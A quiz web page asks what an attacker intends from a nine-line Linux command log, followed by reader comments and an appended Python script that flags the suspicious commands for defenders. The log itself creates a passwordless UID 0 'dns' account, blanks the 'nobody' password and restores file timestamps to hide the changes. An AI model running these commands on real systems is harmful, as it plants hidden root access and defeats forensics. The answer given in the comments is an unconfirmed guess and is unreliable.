What is the attacker ultimately trying to achieve as inferred from the log sequence?

After studying the following log entries, what is the attacker ultimately trying to achieve as inferred from the log sequence?
1. mkdir -p /etc/X11/applnk/Internet/.etc
2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd
3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
4. touch -acmr /etc /etc/X11/applnk/Internet/.etc
5. passwd nobody -d
6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
7. passwd dns -d
8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
9. touch -acmr /etc/X11/applnk/Internet/.etc /etc


A. Change password of user nobody

B. Extract information from a local directory

C. Change the files Modification Access Creation times

D. Download rootkits and passwords into a new directory

Explanation:



Leave a Reply 4



Satshop

I was very pleased to find your website. I wanted to thank you for your time for this nice article!!

I am definitely enjoying every little bit of it and I have you bookmarked to check out new stuff you post.

Best regards Alex

Guest

I think it's wrong and the answer is A and C.

Does “passwd username” not change the username's password?

I’m not sure what -d does. Could that be the new password?

Guest

-d is to delete password. That will make user “nobody” passwordless. C is correct as touch is used to change timestamp also. Option details are given below.

-a Change only the access time.
-c, --no-create Do not create any files.
-m Change only the modification time.
-r, --reference=FILE Use this FILE’s times instead of current time.

Regards,
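
As an added example (not part of the original page or its comments), this Python code replays the nine logged commands and flags what a defender reviewing such a history would look for: `touch -r` calls that save a path's times to a stash and later restore them, a UID 0 account being created, and `passwd -d` removing a password. The function names and finding labels are assumptions made for illustration.

```python
import shlex

# Command log exactly as given in the question above.
LOG = """mkdir -p /etc/X11/applnk/Internet/.etc
mkdir -p /etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
touch -acmr /etc /etc/X11/applnk/Internet/.etc
passwd nobody -d
/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
passwd dns -d
touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
touch -acmr /etc/X11/applnk/Internet/.etc /etc""".splitlines()

def touch_ref(argv):
    """Return (reference, target) when touch copies times from a reference file."""
    ref, paths, it = None, [], iter(argv[1:])
    for a in it:
        if a.startswith("--reference="):
            ref = a.split("=", 1)[1]
        elif a.startswith("-") and not a.startswith("--") and a.endswith("r"):
            ref = next(it, None)  # clustered short options such as -acmr
        elif not a.startswith("-"):
            paths.append(a)
    return (ref, paths[0]) if ref and len(paths) == 1 else None

def operand(argv, takes_value=()):
    """First non-option word, skipping the values of the listed options."""
    words = argv[1:]
    for i, a in enumerate(words):
        if not a.startswith("-") and (i == 0 or words[i - 1] not in takes_value):
            return a

def analyze(lines):
    findings, stash = [], {}  # stash: copy holding saved times -> original path
    for n, line in enumerate(lines, 1):
        argv = shlex.split(line)
        cmd = argv[0].rsplit("/", 1)[-1]
        if cmd == "touch" and (pair := touch_ref(argv)):
            ref, target = pair
            if stash.get(ref) == target:  # times copied back onto the original
                findings.append((n, "timestamps_restored", target))
            else:
                stash[target] = ref
                findings.append((n, "timestamps_saved", ref))
        elif cmd in ("adduser", "useradd") and ("-u", "0") in zip(argv, argv[1:]):
            findings.append((n, "uid0_account_created", operand(argv, ("-u", "-g", "-d", "-s"))))
        elif cmd == "passwd" and "-d" in argv:
            findings.append((n, "password_deleted", operand(argv)))
    return findings
```

Account changes that fall between a `timestamps_saved` and a matching `timestamps_restored` finding are the ones whose modification times on `/etc/passwd` and `/etc` will look untouched afterwards.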